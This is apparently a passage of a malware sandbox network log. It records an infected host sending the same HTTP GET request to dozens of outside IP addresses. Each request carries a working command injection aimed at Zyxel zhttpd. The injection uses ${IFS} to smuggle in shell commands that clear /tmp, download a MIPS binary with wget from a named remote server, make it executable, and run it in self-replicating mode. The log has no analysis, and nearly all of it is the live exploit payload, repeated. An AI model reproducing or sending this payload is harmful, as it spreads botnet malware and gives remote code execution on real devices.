                                            Jan 14, 2024 15:50:50.641158104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7211192.168.2.2339894156.154.22.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641206980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7212192.168.2.235670041.134.133.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641223907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7213192.168.2.235965068.31.7.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641230106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7214192.168.2.2341472202.217.168.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641244888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7215192.168.2.234757485.24.224.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641313076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7216192.168.2.234922641.171.251.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641324043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7217192.168.2.2337522145.114.44.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641360998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7218192.168.2.2341214161.0.164.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641371012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7219192.168.2.234897464.143.108.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641388893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7220192.168.2.2343878176.102.170.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641418934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7221192.168.2.2356058180.108.169.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641455889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7222192.168.2.234271449.227.215.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641455889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7223192.168.2.2347024201.73.249.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641486883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7224192.168.2.234477880.208.154.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641540051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7225192.168.2.235448027.97.228.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641540051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7226192.168.2.2349476166.106.75.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641593933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7227192.168.2.2336776130.133.95.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641632080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7228192.168.2.234962450.76.205.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641676903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7229192.168.2.233414637.204.166.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641691923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7230192.168.2.2339694193.79.60.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641722918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7231192.168.2.234686218.219.27.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641762972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7232192.168.2.235659660.40.67.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641772985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7233192.168.2.234695453.45.136.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641812086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7234192.168.2.2348726223.8.99.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641830921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7235192.168.2.233730894.214.128.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641868114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7236192.168.2.2347970185.87.80.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641910076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7237192.168.2.2354214135.90.243.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641927958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7238192.168.2.2339620188.6.156.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641959906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7239192.168.2.2334020170.51.32.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641997099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7240192.168.2.235510281.177.255.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642015934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7241192.168.2.2339956192.150.185.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642029047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7242192.168.2.2354522150.242.111.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642067909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7243192.168.2.2357294190.62.102.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642142057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7244192.168.2.233781442.76.20.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642267942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7245192.168.2.2343966183.8.248.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642288923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7246192.168.2.235166417.169.69.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642327070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7247192.168.2.2347364150.185.251.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642368078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7248192.168.2.2351450181.196.116.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642381907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7249192.168.2.2351634104.115.157.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642401934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7250192.168.2.234273873.143.127.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642455101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7251192.168.2.2336308175.251.111.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642478943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7252192.168.2.233395884.47.8.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642492056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7253192.168.2.234186690.49.66.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642528057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7254192.168.2.233519059.32.104.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642546892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7255192.168.2.234942082.222.195.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642555952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7256192.168.2.233403032.241.166.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642601967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7257192.168.2.2355368169.192.77.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642637968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7258192.168.2.2356720180.55.155.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642643929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7259192.168.2.235303865.77.74.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642678022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7260192.168.2.235170463.234.40.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642730951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7261192.168.2.234364070.144.31.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642730951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7262192.168.2.2360288191.244.114.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642765045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7263192.168.2.2346310168.251.58.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642793894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7264192.168.2.2346768114.71.254.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642844915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7265192.168.2.2354362217.98.30.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642853022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7266192.168.2.2354870206.149.200.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642868996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7267192.168.2.2355868171.245.155.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642919064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7268192.168.2.235263849.16.80.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.642973900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7269192.168.2.2345204138.3.220.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643011093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7270192.168.2.2343004113.163.243.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643032074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7271192.168.2.2340118110.123.58.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643057108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7272192.168.2.235562677.56.32.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643069983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7273192.168.2.2346500202.70.191.177443
                                            TimestampBytes transferredDirectionData
